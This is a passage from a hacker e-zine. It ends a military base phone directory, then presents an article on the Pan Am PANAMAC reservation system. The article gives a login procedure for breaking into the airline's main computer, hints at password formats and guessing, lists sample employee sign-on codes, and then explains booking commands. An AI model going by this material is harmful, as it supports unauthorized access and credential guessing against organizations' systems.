  1612. Letterman Genral Hospital, San Francisco........................ 586-XXXX
  1613.                                                      Oper Assit. 586-2231
  1614. Los Angeles AFS................................................. 833-XXXX
  1615.                                                      Oper Assit. 833-1110
  1616.                                                       Info Oper. 989-1780
  1617.                                                        MLP Oper. 838-XXXX
  1618. March AFB, Riverside............................................ 947-XXXX
  1619.                                                      Oper Assit. 947-1110
  1620. Marine Corps AirSta, El Toro.................................... 524-XXXX
  1621.                                                      Oper Assit. 997-3011
  1622.                    Rctg Depot, San Diego........................ 524-XXXX
  1623.                                                       Info Oper. 524-1011
  1624.                    Log Sup Base, Barstow........................ 282-XXXX
  1625.                                                      Oper Assit. 282-0111
  1626. Marine Corps Air Ground Combat 29 Palms.................... 952-5XXX/6XXX
  1627.                                                      Oper Assit. 952-6000
  1628. Mather AFB, Sacramento.......................................... 828-XXXX
  1629.                                                      Oper Assit. 828-1110
  1630. McClellan AFB, Sacramento....................................... 633-XXXX
  1631.                                                      Oper Assit. 633-1110
  1632.                AUTODIN Tech Con, Sacramento..................... 730-1493
  1633. MCS Office Long Beach........................................... 360-6645
  1634. Mil Tfc Mgt Cmd (MTMC) WA HQ Oakland Army Base.................. 859-XXXX
  1635.                                                      Oper Assit. 859-0111
  1636.                WA MOT Bat Area.................................. 859-XXXX
  1637.                WA S/CA Outport SAn Pedro OPER Asst.............. 853-1650
  1638.                MTMC WA MATCO Norton AFB CA...................... 876-XXXX
  1639.                MTMC WA MATCO Norton AFB OPER Asst............... 876-1110
  1640.                MTMC WA MATCO Travis AFB CA...................... 837-XXXX
  1641.                MTMC WA MATCO Travis AFB OPER Asst............... 837-1110
  1642. Natl Gd State Maint Ofr, Sacramento............................. 466-6571
  1643.                                                      Oper Assit. 466-6605
  1644. Natl Parachute Test Range, El Centro............................ 958-8XXX
  1645.                                                      Oper Assit. 958-8212
  1646.                                                  Non-Duty Hours. 958-8547
  1647. Nav Air Sta, Alameda............................................ 686-0111
  1648.                Imperial Beach................................... 951-0111
  1649.                Lemoore.......................................... 949-0111
  1650.                Miramir.......................................... 577-XXXX
  1651.                                                      Oper Assit. 577-1011
  1652.                Moffett Fld, Sunnyvale........................... 462-0111
  1653.                COM NAS North Island............................. 951-0111
  1654. Nav Amph Base - Coronado, San Diego............................. 577-XXXX
  1655.                                                      Oper Assit. 577-2011
  1656. Nav Comm Sta, NavOp Radio and Tele(NORATS), San Diego........... 958-3XXX
  1657.                                                      Oper Assit. 958-3011
  1658.               San Francisco, Stockton........................... 466-7444
  1659.                "     "       Tech Con, Stockton................. 730-1581
  1660. Nav Const Bn Cen, Port Hueneme.................................. 360-XXXX
  1661.                                                      Oper Assit. 360-4001
  1662.               Cdmr Nav Base, San Diego.......................... 958-3011
  1663. Nav Hosp, Long Beach............................................ 873-9XXX
  1664.                                                      Oper Assit. 873-9011
  1665.               Oakland........................................... 855-XXXX
  1666.                                                      Oper Assit. 855-5000
  1667.               San Diego......................................... 522-6011
  1668. OIC of Navy Const, Mare Island.................................. 253-XXXX
  1669.                                                      Oper Assit. 253-2101
  1670.               Mare Isl Vallejo.................................. 253-XXXX
  1671.                                                      Oper Assit. 253-0111
  1672. Nav Ocean Sys Ctr............................................... 553-XXXX
  1673.                                                      Oper Assit. 533-0111
  1674. Nav Shp Wpn Sys Engr Sta, Port Hueneme.......................... 360-XXXX
  1675.                                                      Oper Assit. 360-4711
  1676. Nav Sta, Long Beach............................................. 360-XXXX
  1677.                                                      Oper Assit. 360-0111
  1678. Nav Sta, San Diego.............................................. 958-XXXX
  1679.                                                      Oper Assit. 958-0111
  1680. Nav Sta, Treasure Island, San Francisco......................... 869-XXXX
  1681.                                                         Duty Off 869-6233
  1682.                                                      Oper Assit. 869-6411
  1683.                                                    Non Duty Hrs. 869-6233
  1684. Nav Sup Cen, Oakland............................................ 836-XXXX
  1685.                                                       Oper Assit.836-0111
  1686.                                                        Info Oper 836-4011
  1687.                San Diego........................................ 522-XXXX
  1688.                                                      Oper Assit. 522-1011
  1689. Nav Tng Cen, San Diego.......................................... 524-XXXX
  1690.                                                       Oper Asst. 524-0111
  1691. Nav Tng Cmd Pac Fleet, San Diego................................ 524-XXXX
  1692.                                                      Oper Assit. 524-0111
  1693. NAVSURFPAC, San Diego........................................... 958-9XXX
  1694.                                                      Oper Assit. 958-9101
  1695. South Pac, Moffet Fld........................................... 462-XXXX
  1696.                                                      Oper Assit. 462-0111
  1697. Nav Wpns Cen China Lake......................................... 437-XXXX
  1698.                                                      Oper Assit. 437-9011
  1699. Nav Wpns Sta, Concord........................................... 253-5111
  1700. Nav Wpns Sta Steal Beach........................................ 873-7XXX
  1701.                                                      Oper Assit. 873-7000
  1702. Navy Post Grauduate School, Monterey............................ 878-XXXX
  1703.                                                      Oper Assit. 878-0111
  1704. Norton AFB, San Bernardino...................................... 876-XXXX
  1705.                                                      Oper Assit. 876-1110
  1706.                AUTODIN Tech Con................................. 898-3944
  1707. Oakland Army Base............................................... 859-XXXX
  1708.                                                      Oper Assit. 859-0111
  1709. Pacific Msl Test Cen, Point Mugu................................ 351-XXXX
  1710.                                                      Oper Assit. 351-1110
  1711. Pasadena Fed Cen................................................ 879-5011
  1712. Point Sur Nav Fac, Big Sur...................................... 629-1470
  1713. Presidio of San Francisco....................................... 586-XXXX
  1714.                                                      Oper Assit. 586-1110
  1715. Rio Vista....................................................... 586-5837
  1716. Riverbank Army Ammo Plt......................................... 466-4100
  1717. Sacramento Air Log Cen.......................................... 633-XXXX
  1718.                                                      Oper Assit. 633-1110
  1719. Sacramento Army Depot........................................... 839-XXXX
  1720.                                                      Oper Assit. 839-1110
  1721. Sharpe Army Depot, Lathrop...................................... 462-2XXX
  1722.                                                      Oper Assit. 462-2011
  1723. Sierra Army Depot, Herlong...................................... 830-9XXX
  1724.                                                      Oper Assit. 830-9910
  1725. Space & Msl Sys Org, Los Angeles................................ 833-XXXX
  1726.                                                      Oper Assit. 898-1780
  1727. Travis AFB, Fairfield........................................... 837-XXXX
  1728.                                                      Oper Assit. 837-1110
  1729.                 22nd AF Tac Cmd Post............................ 730-1410
  1730.                 22nd AF Tac PBX................................. 869-3480
  1731. USPFO Natl Gd, San Luis Obispo.................................. 879-9201
  1732.                                                      Oper Assit. 878-9211
  1733. Vanderberg AFB, Lompox.......................................... 27X-XXXX
  1734.                                                      Oper Assit. 276-1110
  1735. West Div Nav Fac Engr Cmd, San Bruno............................ 859-XXXX
  1736.                                                      Oper Assit. 859-7111
  1737. 6th Army Presidio of San Francisco.............................. 586-1110
  1738. 15th Air Force wea Spt Unit, March AFB.......................... 727-1647
  1739.  
  1740.                              END OF PART 1
  1741.                              DDDDDDDDDDDDDD
  1742. The file is getting rather long and dont want to bore people with long lists
  1743. of numbers therefore, Part ][ & Part ]I[ will be on later issues of P/HUN
  1744. Online Magazine.
  1745.  
  1746. DareDevil at P/HUN Magazine Inc.
  1747.  
  1748.  
  1749. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1750. =                 P/HUN Issue #3, Volume 2: Phile #5 of 11                    =
  1751. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1752.  
  1753.  
  1754.             /X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
  1755.             X                                                /
  1756.             /  The Pan Am Airline Computer (c) 1994 "PART A" X
  1757.             X  --------------------------------------------- /
  1758.             /                                                X
  1759.             X                By  Red Knight                  /
  1760.             /                                                X
  1761.             X   A P/HUN Magazine Incorporation Productions.  /
  1762.             /                                                X
  1763.             X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/
  1764.  
  1765.  
  1766. Introduction:
  1767. -------------
  1768. Ever wondered how the airline computers work? Well this article will inform
  1769. you as to various information,commands etc. The more you know about them the
  1770. more favors you can ask of them. I will go into details on how they go about
  1771. booking actual flights so you get an understanding on how its done. The article
  1772. will have actual outputs etc and explained in depth.
  1773.  
  1774. The best way to explain to first understand the PANAMAC computer. Then you
  1775. can go on and hack the main Pan Am computer because all the commands are the
  1776. same.
  1777.  
  1778. What is PANAMAC?:
  1779. ----------------
  1780. PANAMAC are computers Pan Am's Sales Agent use for booking flights, answering
  1781. our various questions on arrivals,departures,visa etc.This is only a small
  1782. percentage of the questions.PANAMAC is full of info.
  1783.  
  1784. Where can you find answers to the these questions:
  1785.  
  1786. - What is a DH7 aircraft
  1787. - How many passengers were their in flight P2308 last month
  1788. - What will be the bus fair when traveling from Mombasa to Nairobi in Kenya
  1789. - What does SXR represent
  1790. - Information on carrying pets
  1791. - Where does one go for yellow fever shot in Kansas or anywhere in USA
  1792. - What is the departure tax from from anywhere in the world
  1793. - How many ciggerates is one allowed to take from USA to Pakistan
  1794. - Where to stay
  1795. - Which hotels?
  1796. - Weather conditions in a particular country
  1797. - Flight delays
  1798.  
  1799. Get my drift? Well the above questions can be answered using the PANAMAC.
  1800. PANAMAC is manufactured by ICOT.
  1801.  
  1802.  
  1803. Logging On to The Main Pan-Am Computer: (Not the PANAMAC )
  1804. DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  1805. [This particular info on logging on was acquired from a Pan-Am employee]
  1806. DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  1807. This is the most hardest part of all. While logging on to the Pan Am computer
  1808. you will not see any type of an identifier. These system use E,7,1
  1809. characterists.
  1810.  
  1811. Enter as follows:
  1812.  
  1813. ".Nodes" or ".N" then the Node Identifier:
  1814.  
  1815. The Node identifier:
  1816. DDDDDDDDDDDDDDDDDDDD
  1817. This part of info will contain the NPA a person is calling from and then
  1818. followed by a 7 digit access number in which last two are the state abb.
  1819.  
  1820. An example would be: 71811355NY <C/R>
  1821. Its a high possiblity that the "11355" could be a zip code
  1822.  
  1823. The Person ID:
  1824. DDDDDDDDDDDDDD
  1825. After the Node Identifier enter:
  1826.  
  1827. .PI [ (NPA,8 Alpha Numeric Chracters which first being a letter)
  1828.  
  1829. Password
  1830. DDDDDDDD
  1831. The password is assigned to the employees which is supposed to be 6 to 8
  1832. characters alphanumeric with first being usually "P"
  1833.  
  1834. Enter Password using ".P" or ".PASSWORD" (No echo)
  1835.  
  1836. (After this you will get a long pause for about 1 min) Then if you guessed
  1837. wrong then it will log you off.
  1838.  
  1839. Your in!!!
  1840. DDDDDDDDDD
  1841. If you have made it so far then you are a hell of Hacker and you have my full
  1842. respect.
  1843. After you have entered correct information then you will get a message like
  1844. this:
  1845.  
  1846. Pan Am Airlines (4854.00PA)
  1847. Unauthorized Access will lead to a prosecution.
  1848.  
  1849. > ( This is the SOM Prompt)
  1850.  
  1851. (After that you will get a "SOM" prompt. Then from here on your home free.
  1852. The SOM is there for you. Almost all the commands in the PANAMAC will work
  1853. on their Main Computer.
  1854.  
  1855. DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  1856. ** NOTICE ,READ CAREFULLY **
  1857.  
  1858. >From here on the article will deal with PANAMAC Airline Computer which your
  1859. sales agent uses to book you a flight and give you information.
  1860. You wont be able to call these up tho, but rather use the infomation provided
  1861. here when you hack the Main Pan-Am Airline Computer. (Process is described
  1862. above)
  1863.  
  1864. I repeat, all the commands are on The PANAMAC will work on the Main Computer.
  1865.  
  1866. DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  1867. Basic PANAMAC hardware:
  1868. -----------------------
  1869. A set consists of a display screen, standard type writer key board with row of
  1870. function keys along the top. There will also be a block of keys to the right
  1871. of the main key board and another block of keys to the far right.
  1872. I will explain almost all the keys on the board.The keyboard is a little
  1873. different from the regular IBM keyboards.
  1874.  
  1875.                    Basic Layout of a PANAMAC keyboard
  1876.                    DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  1877. ____________________________________________________________________________
  1878. |                                                                           |
  1879. |  +----------------------------------------------------------------------+ |
  1880. |  |                F   U  C  T  I  O  N    K  E  Y S                     | |
  1881. |  +----------------------------------------------------------------------+ |
  1882. |                                                                           |
  1883. |  +---------------------------------------+  +---------+ +---------------+ |
  1884. |  |                                       |  | cursor  | |               | |
  1885. |  |                                       |  |  keys   | |               | |
  1886. |  |                                       |  | Next    | |  PF 1-30      | |
  1887. |  |  Basic Keyboard with twin functions   |  | Part    | |  15 keys      | |
  1888. |  |  invoked by ALT + [Key]               |  | Delete  | |               | |
  1889. |  |                                       |  |  etc.   | |               | |
  1890. |  |                                       |  |         | |               | |
  1891. |  +---------------------------------------+  +---------+ +---------------+ |
  1892. |___________________________________________________________________________|
  1893.  
  1894. Here is a list that are used the most.The rest that I did not go into details
  1895. are almost never used.
  1896. (They can be invoked by using the ALT plus the approriate key)
  1897.  
  1898.  For eg. The (CALC) - Use to get into calculator mode.
  1899.  
  1900.            +------+
  1901.            |  Z   |
  1902.  ALT  +    +------+ ----> CALCULATOR MODE
  1903.            | CALC |
  1904.            +------+
  1905.  
  1906. (CHNG SCRN) - Changes from one screen to the second screen.
  1907.  
  1908. (CHANGE) - Used when changing name entries.
  1909.  
  1910. (RESET) - to reset the system.Eg. IF you are in the CALC mode to use this
  1911.         return to regular mode.
  1912.  
  1913. (IGN) - Used to ignore any transaction made like when you enter something
  1914.        for example in the PNR (Passenger Name & Record) and you dont wish to
  1915.        save the current format you would use the IGN.
  1916.  
  1917. (XITN) -Cancel all itinerary in a PNR. The intinerary is the record of a flight
  1918.  
  1919. (ARNK) - Arrival not known.
  1920.  
  1921. (ET) - End Transaction. This store the the edited PNR.
  1922.  
  1923. (GFAX) - General FACTS. Info on passengers that Pan Am & other airlines need to
  1924.          know.
  1925.  
  1926. (FAX) - Host FACTS. Info on passengers that only Pan Am needs to know.
  1927.  
  1928. (RMKS) - Remarks field to store misc info.
  1929.  
  1930. (RCVD) - Received filed. Name of person who made the booking.
  1931.  
  1932. (SEG) - Leave an open segment for a passenger who may want to return at an
  1933.         unknown date but is sure that he/she will travel by Pan Am.
  1934.  
  1935. (IAS) - The "/" key is on the bottom of the keyboard. The letters "IAS" stand
  1936.         for Insert After Segement (will be used later in the article).
  1937.  
  1938. (NAME) - Name of persons traveling eg. -3smith/sethmr/danmr/loydmr  this is
  1939.         an eg. of an entry made if three person seth, dan, loyd were travelling
  1940.         a family obviosly having the same last name.
  1941.  
  1942. (DSPL) - Display a PNR, history, itin etc.
  1943.  
  1944. (CLEAR) - To clear the field that you are working in (To clear all fields press
  1945.           ALT - CLEAR)..Doesn' delete any info.
  1946.  
  1947. (ALARM) - When you hear a "beep" use ALT-R (alarm) to clear the alarm.
  1948.  
  1949. (SOM) - Start of message.You will receive a new start of message.
  1950.  
  1951. (CLICK) - A toggel to switching on & off of the blinking of the cursor.
  1952.  
  1953. (RDUC) - Reduce fares.This is to view fares on senior citizen, students etc.
  1954.  
  1955. (ERASE) - A sort of a DEL key to delete the last character.
  1956.  
  1957. (SHIFT) - Used to toggle the second mode of the key.
  1958.  
  1959. (CALC) - To get to the calculator mode.
  1960.  
  1961. (END-I) - Used to display domestic fairs.
  1962.  
  1963. (END ITEM) - Used while inputing many name entries;Instead of using the <C/R>.
  1964.  
  1965. (ENTER) - Self explanatory.
  1966.  
  1967. (EDIT FRMAT) - To transpose a copy from one field so another.
  1968.  
  1969. (NEXT PART) - Move the cursor from one field to another.
  1970.  
  1971. (INSERT CHAR) - Insert a character.
  1972.  
  1973. (DELETE CHAR) - Erase a character between a word and moves up the rest of the
  1974.                 word.
  1975.  
  1976. (INSERT LINE) - To Insert a line.
  1977.  
  1978. (DELETE LINE) - Self Exp. but cursor remains there.
  1979.  
  1980. (PART) - Just like the cursor keys UP,DOWN,RIGHT,LEFT.
  1981.  
  1982. (PF10) - To direct a command to the upper left field.
  1983.  
  1984. (PF11) - "    "    "    "     "  "    "   right ".
  1985.  
  1986. (PF13) - "    "    "    "     "  "  bottom left ".
  1987.  
  1988. (PF14) - "    "    "    "     "  "    "   right ".
  1989.  
  1990.                           Part II
  1991.                           DDDDDDD
  1992. SOM/CURSOR:
  1993. ----------
  1994. When they first start, the screen is divided into 4 parts (dotted
  1995. line line sepating the four fields.Each of those four field
  1996. contains the SOM (this is PANAMAC prompt).The SOM looks like
  1997. an equilateral triangle pointing towards the right.The cursor
  1998. could be in any field or left of when last used.
  1999. In this article the I have characterized the SOM as ">"
  2000. Now to move to the next field one would use the "NEXT PART" key.
  2001.  
  2002. SINNING IN (LOGGING IN):
  2003. ------------------------
  2004. In order to use the PANAMAC the all sales agents have to sine in.
  2005. Each user is assinged 2 things:
  2006.  
  2007. 1) COLLINS SINE: - This is needed to sine in to the phone.
  2008. 2) PANAMAC SINE: - This is needed to access the computer.
  2009.  
  2010.  
  2011. COLLINS SINE:
  2012. -------------
  2013. The COLLINS SINE is a code used to access the phone system to receive calls
  2014. and make calls.This serves as an unlocking device
  2015. The collins sine consists of 9 chracters.The first is always an asterisk the
  2016. next two are CAPITALS letters almost always (SI)
  2017. Here are some examples of COLLINS SINEs :
  2018.  
  2019. *SI340450
  2020. *SI409321
  2021. *SI345090
  2022. *SI430092
  2023.  
  2024. By sinning into the telphone is exactly what I mean. One would enter in thru
  2025. the touch tones (NOT THRU THE COMP)
  2026. So therefore *SI30450 one would would enter the * ,74 for SI then the rest
  2027. of the #s.
  2028.  
  2029. Heres how the telephone key PAD looks :
  2030.  
  2031. _________________________________________________________________
  2032. |  ____________________________   _______    _______   _______  |
  2033. |  |        |        |        |   | REL |    |EMGY |   | CW   | |
  2034. |  |        |  ABC   |   DEF  |   |_____|    |_____|   |______| |
  2035. |  |    1   |   2    |    3   |   |DAIL |                       |
  2036. |  |________|________|________|   |_____|                       |
  2037. |  |        |        |        |   |SUPV |                       |
  2038. |  |   GHI  |   JKL  |   MNO  |   |_____|                       |
  2039. |  |    4   |    5   |    6   |                                 |
  2040. |  |________|________|________|                                 |
  2041. |  |        |        |        |                                 |
  2042. |  |   PQR  |   TUV  |   WXY  |                                 |
  2043. |  |    7   |    8   |    9   |                                 |
  2044. |  |________|________|________|    _____                        |
  2045. |  |   *    |   0    |    #   |   | IN  |                       |
  2046. |  |________|________|________|   |_____|  _____                |
  2047. |                                 | AVI | | RPT |               |
  2048. |                                 |_____| |_____|               |
  2049. |_______________________________________________________________|
  2050.  
  2051. Key Pad:
  2052. --------
  2053. IN - The IN key on the telephone key pad serves as a hold button the key will
  2054.      blink when customer is on hold.
  2055. AVI - (Available) is depressed when the sales agent is available for the
  2056.       next call.
  2057. RPT - [Unknown]
  2058.  
  2059. REL - (Release) Pushed when the sales agent doesn't want to be instantly
  2060.       available for the next call. Depress AVI before releasing call.
  2061. DAIL - (out dail) - Depress the key and dial out. Method :
  2062.        1) When asking for help 7714,7721,7713
  2063.        2) Pantel (Used to call up the Pan Am airport) - 8XXX-XXXX
  2064.        3) Local 212 Calls 9XXX-XXXX.
  2065.        4) All others 8XXX-XXX-XXXX
  2066. SUPV - When the sales people ask for assistance
  2067. EMGY - This key is an important one. Suppose some one makes a bomb threat
  2068.        this key is immediatly depressed and the conversation is recorded in
  2069.        another room. The sales agents have been taught to keep them online
  2070.        as much as they can.
  2071. CW -  Will be used for Call Waiting in the future.
  2072.  
  2073. PANAMAC SINE:
  2074. -------------
  2075. The PANAMAC SINE in consists of 10 characters with BSIA (always) the first
  2076. four. The next four are all numbers and the last 2 are letters which could be
  2077. anything.
  2078.  
  2079. Examples:
  2080.  
  2081. BSIA0290KI
  2082. BSIA8534PO
  2083. BSIA3309DS
  2084.  
  2085. Procedure:
  2086. ----------
  2087. This is the procedure they follow:
  2088. 1) Sine in to the telephone - *SI
  2089. 2) Sine out - *SO ( the SO stands for sining out)
  2090. 3) Sine in the computer - [PAMAMAC SINE]
  2091. 4) Sine into the telephone
  2092.  
  2093. Now the sales agent is ready to receive calls.
  2094.  
  2095. General Information Index:
  2096. --------------------------
  2097. PANAMAC contains most of the technical information that is needed by the
  2098. the service representatives.
  2099.  
  2100. To display (G)eneral (I)nformation (I)ndex you would input:
  2101.  
  2102. >KIINF  followed by the first letter of the subject desired.
  2103.  
  2104. OUTPUT:
  2105.  
  2106. KIABLA - Albany Airport Info
  2107. KIATLA - Airport at Atlanta Georgia
  2108. KIAULA
  2109. KIABWA
  2110. KIBOSA
  2111. :
  2112. etc ...
  2113. :
  2114. KIZAQE
  2115.  
  2116. By just entering KIINF you would get all the KIINF Index from A to Z.
  2117. You can take it as if the KIINF is a root directory and its divided into
  2118. thousands of subdirectories.
  2119.  
  2120. The letter KI actually stands for Key In followed by the INF for
  2121. information.
  2122.  
  2123. For example if you wanted to display general information on car rentals
  2124. it would like this:
  2125.  
  2126. >KIINFC  (Type at the SOM)
  2127.  
  2128. The system will list car-rental related files.Then all they do is retrieve
  2129. it.
  2130.  
  2131. Station Information File (CITY INDEX)
  2132. ------------------------------------
  2133. PANAMAC also contains information about specific cities.To display the
  2134. Index for a particular city, one is able to Key In (KI) and type in the
  2135. three letter city code. So lets say you wanted some information about
  2136. Atlanta : Type in:
  2137.  
  2138. >KIATL
  2139.  
  2140. This will display all of the files concerning Atlanta. Now to display a
  2141. particular file to view one would enter KIATL plus the the letter code of the
  2142. file name. Therefore if you wished to view the information on airports in
  2143. Atlanta enter:
  2144.  
  2145. >KIATLA
  2146.  
  2147. you will have a screen filled with all sorts of information about the Airports
  2148. in Atlanta.
  2149.  
  2150. Examples of some Catagories of G.I.N
  2151. ------------------------------------
  2152.  
  2153. Index        Help On
  2154. -----        -------
  2155. KISKDE  - What type of Aircraft is an AB3 ?
  2156. KIXXKU  - What is the City Code for Kuala Lampur ?
  2157. KICCCG  - What is the currency code for Greek money and whats it called ?
  2158. KITTA   - What movies will be shown on the flights next month ?
  2159. KIIHCH  - Is there an Inter-Continental Hotel in Columbo ?
  2160. KIBOMC  - How many cigarettes are allowed for a passenger going to Bombay ?
  2161. KINYCV  - Where can one go to get a Yellow Fever shot on N.Y ?
  2162. KIJFKT  - How much will a taxi cost from JFK Airport into the city ?
  2163. KILONK  - What time did a flight PA 56 arrive in London this morning ?
  2164.  
  2165. Its impossible to list all the Key Ins in this article. In future I may
  2166. write up an article listing all of these.
  2167.  
  2168.  
  2169.                           Part III
  2170.                           DDDDDDDD
  2171.  
  2172. Booking Pan Am Flights:
  2173. -----------------------
  2174. To ask Panamac which flights are available on a specific day, you type a
  2175. standard availability entry :
  2176.  
  2177. >A 6JUNNYCMIA0900
  2178.  
  2179. Lets break it down:
  2180.  
  2181. - The 'A' is always used.Its is the action code to request availability
  2182. - The '6' is the departure date
  2183. - The 'JUN' is obviously the first three letters of the month
  2184. - 'NYC' is the origin city where the flight is taking off
  2185. - 'MIA' is destination city which in this case would be Miami
  2186. - and the '0900' is the time desired
  2187.  
  2188. So therefore on a flight on 3rd of July from Nairobi to London at 1100 hours
  2189. would be:
  2190.  
  2191. >A3JULNBOLON1100 [spacing is optional]
  2192.  
  2193. When requesting availabity FROM/TO codes should be CITY codes.This
  2194. will allow Panamac to display the full schedule of flights operating
  2195. FROM/TO all airports in that city,beginning with the time requested.
  2196. For eg. If you request availability FROM/TO JFK,Panamac will only
  2197. display flights that operate FROM/TO JFK but If you request availabilty
  2198. FROM/TO NYC, Panamac will display flights operate FROM/TO JFK and LGA
  2199.  
  2200. Availabity Display:
  2201. -------------------
  2202.  
  2203. Panamac will display up to 6 lines of both direct and connecting services
  2204. beginning with the Pan Am flights closest to the time requested.
  2205.  
  2206. For eg: Lets assume that one the sales agent has made the following entry
  2207.         from Newyork city to Frankfurt:
  2208.  
  2209. >A 18AUGNYCFRA1800
  2210.  
  2211. The Panamac will display the following output:
  2212.  
  2213. 18 AUG-THU-PA HELI FREE PJ                  ALTERNATE SERVICE
  2214. 1PA   72  PAJAYABOHA   JFKFRA   1830  0745*1  74X  DDD0  715
  2215. 2PA   4   PAJAYABAHA   JFKFRA   1800  1215*1  74*  DDD1  1015
  2216.  :    :      :           :        :     :      :    :     :
  2217.  [and so on...]
  2218.  
  2219. Rememeber these are "Direct Flights" not connecting
  2220.  
  2221. Analyzing the first 2 lines:
  2222. ---------------------------
  2223. line 1:
  2224. -------
  2225. 18AUG-THU - The date you requested with the day of the week
  2226. PA HELO FREE - City Pair Message..Consists of general info
  2227. ALTERNATE SERVICES - Service other than than direct PA is programmed
  2228.  
  2229. Line 2:
  2230. -------
  2231. 1 - Line number. PMC will display up to six lines of both direct and
  2232.     connecting service beginning with those flights closer to the time
  2233.     required
  2234. PA - PA is the airline code for Pan Am
  2235. 72 - Flight number
  2236. PAJAYABOHA - Indication of classes for eg:
  2237.              P - Premium First Class
  2238.              J - Premuim Clipper Class (wide body aircraft)
  2239.              Y - Mormal Eco Class
  2240.              B - Apex fare
  2241.              H - Bulk Fare
  2242.              A - This indicate that the flight is available
  2243.              0 - No seats available (ZER0)
  2244. JFKFRA - This will tell you the departure and the arrival.Only AIRPORT
  2245.          CODES are used.
  2246. 1830 - Departure time
  2247. 0745 - Arrival time
  2248. *1 - This will show when the flight will arrive one day later
  2249. 74X - [Self explanatory]
  2250. DDD - Indicates that meals are served if Blank then no meals served
  2251. 0 - The NUMBER of time the flight will make a stop between the two airports
  2252.  
  2253. 715 - Elapased flying timw in hours and minutes.
  2254.  
  2255. Sometimes after the entry of classes one may see "X plus to digits of the
  2256. week...For eg. "X13
  2257. This means that flights operates only on certain days of the week except
  2258. Mondays & Wednesdays. If blank then flights are everyday.
  2259.  
  2260.  
  2261. If no specific departure time is indicated by the passenger an availability
  2262. entry can be made indicating "A" for A.M , "P" for P.M and "N" for noon.
  2263.  
  2264. eg.
  2265.  
  2266. >P23FEBNYCAUS  --> In this case the Panamac assumes that its 1700
  2267.  
  2268. Short selling
  2269. -------------
  2270.  
  2271. Lets say one of the availability display was as follows:
  2272.  
  2273. 10DEC
  2274. 4PA  754  JAYA   JFKLHR 600  1200  74X  S  0  6:00
  2275.  
  2276.  
  2277. The departure is from JFK to london's Hethro Airport
  2278. Now suppose  you wanted to book 3 seats on this flight.They would enter as
  2279. follows:
  2280.  
  2281. > N3Y4
  2282.  
  2283. N - This the abb. for "need" for the Panamac
  2284. 3 - Number os seats.In our case 3
  2285. Y - This is the class (Y in this case)
  2286. 4 - This tells us the line number of the Display explained above
  2287.  
  2288. This method of booking seats is called short selling.[Short Sell]
  2289. incase you ever ever hear it.
  2290.  
  2291. The Panamac will respond with:
  2292.  
  2293. 1PA 754 Y 10DEC  JFKLHR  HS3  600 1200
  2294.  
  2295. 1 - This represents the numbers of flights the sales agent has booked
  2296. PA - The 2 letter code for Pan Am
  2297. 754 - Is obviosly the flight #
  2298. Y - The class
  2299. 10DEC - The date of departure from NYC
  2300. JFKLHR - Flight going from Newyork City to London
  2301. HS3 - (H)ave (S)old three seats confirmed
  2302. 600 1200 - the the departure and arrival time
  2303.  
  2304. Connecting Flights:
  2305. -------------------
  2306. Many times a passenger travels from point of origin to final destination
  2307. by connecting from one flight to another at an intermediate point or points
  2308. This will be a single connection wehn only one point (City) is involved
  2309. and there is also a concept of "double connection" ... This obviously means
  2310. that the person changes flights at 2 cities.
  2311.  
  2312. While viewing the display a typical connecting flight would look like this
  2313.  
  2314. 5PA 120 PAJAYABAHA 1DEC  [   ]LON  600  1200   75X  LLL0  600 400
  2315.  
  2316. It is a clearly visible that this is a connecting flight because we have the
  2317. elapsed time (600) and the total elapsed time of connecting service from
  2318. origin city to its destination (400)...Simple enough huh ?
  2319.  
  2320. Short selling is also done in this case.
  2321. Format used:
  2322.  
  2323. [ N ][# SEATS][CLASS][FROM A DISPLAY LINE][ITS CLASS][FROM LINE]
  2324.  
  2325. How to display a particular flight:
  2326. -----------------------------------
  2327. Assume that you have the following flight on an availability display
  2328.  
  2329. 01JAN-FRI-
  2330. 1PM  90  PAJAYABOHA      LAXZRH  1030  0930*1  74X     2 1515
  2331.  
  2332. Suppose you make a reservation on flight 90, the 01JAN and want to ask
  2333. the sales agent where the flights stops en-route and what day the flight
  2334. arrives. This is what he/she will enter into PANAMAC...
  2335.  
  2336. >S PA 90 / 01JAN LAX
  2337.  
  2338. S - Code for schedule
  2339. PA90 - Carrier code & flight number
  2340. / - A slash as a separator
  2341. 01JAN - Departure date from boardpoint
  2342. LAX - is the broad point.The three letter airport code
  2343.  
  2344. Output will be:
  2345.  
  2346. SPA90/1JANLAX
  2347. LAX   JFK    ZRH     STR    TXL
  2348.       1839   0930*1  1210*1 1400
  2349. 1030  2015   1135*1  1255*1
  2350.  
  2351. Flight 90 departs Los Angeles (LAX) at 1030 and arrives New York (JFK) at
  2352. 1839,leave New York at 2015, arrives Zurich at 0930 the next day because the
  2353. (*1) indicate it then leaves Zurich at 1135 that morning arrives in
  2354. Stuttgart (STR) 1200 ... and so on.             .
  2355.  
  2356. Retrieving Itinerary
  2357. --------------------
  2358. It is sometimes necessary to view the booking. This is done by using the
  2359. "*" key on the right top of the keyboard.(THE DISPLAY KEY)
  2360. Then type in "I" for itinerary.
  2361.  
  2362. >* I
  2363.  
  2364. Response will look something like this:
  2365.  
  2366. 1 PA 90 P 13DEC JFKFRA HS3 600 1200
  2367. 2 PA 95 Y 15DEC JFKFRA HS3 700 1300
  2368.  
  2369. [and so on ....]
  2370.  
  2371. Cancelation :
  2372. -----------
  2373. To cancel the booking in line 2 from above example enter:
  2374.  
  2375. >X 2
  2376.  
